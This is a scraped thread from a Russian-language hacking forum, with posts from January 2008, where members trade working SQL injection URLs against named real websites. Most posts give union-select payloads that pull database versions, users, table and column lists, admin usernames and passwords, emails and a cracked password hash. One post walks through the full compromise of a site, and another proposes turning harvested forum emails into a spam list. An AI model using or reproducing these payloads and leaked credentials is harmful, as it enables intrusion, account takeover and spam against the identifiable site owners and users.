FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 424 из 1602

424

Опции темы

Поиск в этой теме

Опции просмотра

04.01.2008, 16:27

А®ТеS

Участник форума

Регистрация: 25.11.2006

Сообщений: 291

Провел на форуме:
1537850

Репутация: 536

Отправить сообщение для А®ТеS с помощью ICQ

MsSQL injection:

Цитата:

http://www.aiim.org/standards.asp?id=1+or+1=(SELECT+db_name())--

www.aiim.org - Google PR 7

04.01.2008, 23:44

А®ТеS

Участник форума

Регистрация: 25.11.2006

Сообщений: 291

Провел на форуме:
1537850

Репутация: 536

http://webcast.streamx.com.au/?id=1'+or+1=(SELECT+db_name())--

Последний раз редактировалось А®ТеS; 04.01.2008 в 23:47..

05.01.2008, 01:05

Ded MustD!e

Members of Antichat - Level 5

Регистрация: 23.08.2007

Сообщений: 417

Провел на форуме:
14324684

Репутация: 3908

http://www.botellaalmar.com.ar/

Код:

http://www.botellaalmar.com.ar/detalle_nota.php?Id=10002&tipo=-1+union+select+concat_ws(0x3a,user(),version(),database())/*

05.01.2008, 01:59

~~ThreeD~~

Banned

Регистрация: 25.12.2006

Сообщений: 179

Провел на форуме:
2337678

Репутация: 354

www.7courier.com

Цитата:

http://www.7courier.com/shopping.php?id=-37+union+select+1,concat(version(),0x3a,database() ,0x3a,user()),3,4,5,6,7/*

4.1.22-standard:thetphyo_7courier:thetphyo_7c@localhost

www.belledune.com

Цитата:

http://www.belledune.com/shopping.php?id=-11+union+select+1,2,convert(concat(version(),0x3a, database(),0x3a,user())+using+latin1),4,5,6,7,8,9, 10,11,12,13/*

5.0.18-nt :belledunedb: belleduneUSER@localhost

www.visitrandolphcounty.com

Цитата:

http://www.visitrandolphcounty.com/shopping.php?id=-11+union+select+1,2,concat(version(),0x3a,database (),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16/*

4.1.20: visitrandolph: visitran@localhost

Последний раз редактировалось ThreeD; 05.01.2008 в 02:20..

05.01.2008, 03:09

scrat

Постоянный

Регистрация: 08.04.2007

Сообщений: 853

Провел на форуме:
5812656

Репутация: 1540

Отправить сообщение для scrat с помощью ICQ

http://new.prikolnoe.tv

Цитата:

http://new.prikolnoe.tv/?show=1&c_id=12&id_movie=275%60
http://new.prikolnoe.tv/?show=1&c_id=12%60&id_movie=275

чёто не оч. получается она у меня

Последний раз редактировалось scrat; 05.01.2008 в 03:13..

05.01.2008, 05:19

halkfild

Постоянный

Регистрация: 11.11.2005

Сообщений: 391

Провел на форуме:
7084941

Репутация: 2277

предистория)) нужно было найти траф.. ну а траф у нас где?) правильно еротика и тд

поиск мне помог

нашли сайт

http://svalka.biz/go.php?go=Download&id=17985/*
http://svalka.biz/go.php?go=Download&id=17985+order+by+6/*

6 полей

http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ ws(0x3a3a,version(),user(),database()),3,4,5,6/*

#5.0.22-log::glamur_svalka@localhost::glamur_svalka
5-тая версия - тянем всю инфу

http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ ws(0x3a3a,version(),user(),database()),3,4,5,6+fro musers/*

http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ ws(0x3A3a,TABLE_SCHEMA,TABLE_NAME),3,4,5,6+from+in formation_schema.tables/*
таблици /*жалко видно таблици только этого хоста*/

glamur_svalka::admin
glamur_svalka::comments
glamur_svalka::downloads
glamur_svalka::fail_logs
glamur_svalka::iplogg
glamur_svalka::linker
glamur_svalka::main_logs
glamur_svalka::que
glamur_svalka::site_downloads
glamur_svalka::succes_logs

http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ ws(0x3A3a,TABLE_SCHEMA,TABLE_NAME,column_name),3,4 ,5,6+from+information_schema.columns/* ну и сами поля /*выбраны сами интересные таблы*/
glamur_svalka::succes_logs::time
glamur_svalka::succes_logs::date
glamur_svalka::succes_logs::ref
glamur_svalka::succes_logs::agent
glamur_svalka::succes_logs::hostname
glamur_svalka::succes_logs::ip
glamur_svalka::succes_logs:

assword
glamur_svalka::succes_logs::username
glamur_svalka::succes_logs::id

glamur_svalka::fail_logs::time
glamur_svalka::fail_logs::date
glamur_svalka::fail_logs::ref
glamur_svalka::fail_logs::agent
glamur_svalka::fail_logs::hostname
glamur_svalka::fail_logs::ip
glamur_svalka::fail_logs:

assword
glamur_svalka::fail_logs::username
glamur_svalka::fail_logs::id

glamur_svalka::admin::id
glamur_svalka::admin::username
glamur_svalka::admin:

assword
glamur_svalka::admin::email
glamur_svalka::admin::level

http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ ws(0x3A3a,id,username,password,email,level),3,4,5, 6+from+glamur_svalka.admin/*
достаем данные пользователей

1::admin::admin::webmaster@kindstot.org::1

мдям.. тяжелый пасс =\ теперь админка.. по стандартным местам ее нет.. смотрим в логах /*нестандартный ход)))*/

http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ ws(0x3A3a,ip,username,password,ref,hostname),3,4,5 ,6+from+glamur_svalka.succes_logs/*
и мне выдало адресс админки))

http://svalka.biz/admin/admincp.php?action=login или подругому

з.ы. в админке нет ничего особо интересного =\
з.з.ы. шел не залил =\

05.01.2008, 08:21

je0n

Постоянный

Регистрация: 14.05.2006

Сообщений: 334

Провел на форуме:
1543521

Репутация: 272

Отправить сообщение для je0n с помощью ICQ

журнал ironman
таблицы, где встречается колонки похожие на "pass"

Цитата:

http://www.ironman.ru/php/news.php3?id=-1123+union+select+1,2,3,table_name,5,6,7,8+from+in formation_schema.columns+where+column_name+like+ch ar(37,112,97,115,115,37)+limit+0,1/*

имеется таблица - account - это от форума. форум кончелыжный, через него замутить ничего нельзя.

Цитата:

http://forum.ironman.ru
Admin:67423383

далее нашлась таблица curent_user - хер пойми что это. там одна запись всего - login

assword

Цитата:

sportservice:470db2cf7130166ae97c78885413fdbd
расшифровал - c6h5cooh

есть админка:

Цитата:

http://ironman.ru/php/admin/

нихрена туда логины и пароли из форума и расшифрованные не катят (БЛ*ТЬ!!!)

есть вебмайл:

Цитата:

http://ironman.ru/webmail/

и phpmyadmin:

Цитата:

http://ironman.ru/myadmin/

добытые пароли, ествественно, никуда не подходят. доступ к таблице mysql.user - закрыт. что еще замутить я больше не знаю!

P.S. из базы имэйлов на форуме можно сделать спам-базу для рассылки рекламы виагры. Думаю, отдача будем ошелмляющей

(на форуме качки обсуждают стеройды)

05.01.2008, 08:44

RaDDeaD

Познающий

Регистрация: 28.12.2006

Сообщений: 44

Провел на форуме:
119257

Репутация: 56

http://www.centrgroup.ru/nn.php?id=-%201+union+select+1,2,3,4,5,concat(id,0x20,user_na me,0x3a,user_pass),7+from+users+where+id=0/*

Тока вот до админки не дорылся...

Последний раз редактировалось RaDDeaD; 05.01.2008 в 09:42..

05.01.2008, 08:50

RaDDeaD

Познающий

Регистрация: 28.12.2006

Сообщений: 44

Провел на форуме:
119257

Репутация: 56

http://www.tni.mil.id/patriotweb/?action=PesanSaran&ed=-1+union+select+0,1,concat(username,0x3a,password,0 x3a,email)+from+user/*

www.ipz.ru

#10

05.01.2008, 13:33

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

www.ipz.ru

http://www.ipz.ru/alltop.php?cat=-1+union+select+version()/*
Версия: 5.0.41-community

http://www.ipz.ru/alltop.php?cat=-1+union+select+concat(login,char(58),password,char (58),email)+from+users+limit+0,1/*

Там 1499 юзеров....Можно через Limit